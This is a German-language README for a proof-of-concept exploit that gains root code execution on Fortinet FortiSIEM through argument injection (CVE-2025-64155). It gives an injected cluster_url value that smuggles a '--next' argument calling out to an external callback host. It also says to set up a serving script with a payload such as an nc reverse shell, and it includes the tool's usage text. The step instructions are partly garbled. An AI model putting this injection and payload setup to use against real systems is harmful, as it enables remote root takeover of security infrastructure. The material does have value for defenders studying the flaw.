
CVE-2025-64155: Fortinet FortiSIEM Argument Injection zu Remote-Codeausführung
Proof-of-Concept-Exploit für Fortinet FortiSIEM, der eine Argument-Injection ausnutzt, um eine Datei zu schreiben und Codeausführung als root zu erlangen
Detaillierte Analyse hier: Horizon3.ai - CVE-2025-64155: Drei Jahre Remote-Rooting des Fortinet FortiSIEM
Das Ausnutzen dieses Problems zum Überschreiben von Anwendungsdateien führt wahrscheinlich zu Systeminstabilitäten. Gehen Sie vorsichtig vor. Überprüfungen können harmlos durchgeführt werden, indem cluster_url wie folgt bearbeitet wird: <cluster_url>http://127.0.0.1:80 --next http://<INTERACTSH_URL></cluster_url>
serve.py auf das gewünschte Payload (z.B. nc Reverse Shell)serve.py ausCVE-2025-64155.py aus% python3 CVE-2025-64155.py -h
usage: CVE-2025-64155.py [-h] -t TARGET [-p PORT]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
The IP address of the target
-p PORT, --port PORT The port of the Phoenix Monitor service
Diese Software wurde ausschließlich zu Zwecken der akademischen Forschung und zur Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, außer wenn dies ausdrücklich autorisiert wurde. Die Projektbetreuer übernehmen keine Verantwortung oder Haftung für Missbrauch der Software. Nutzen Sie sie verantwortungsbewusst.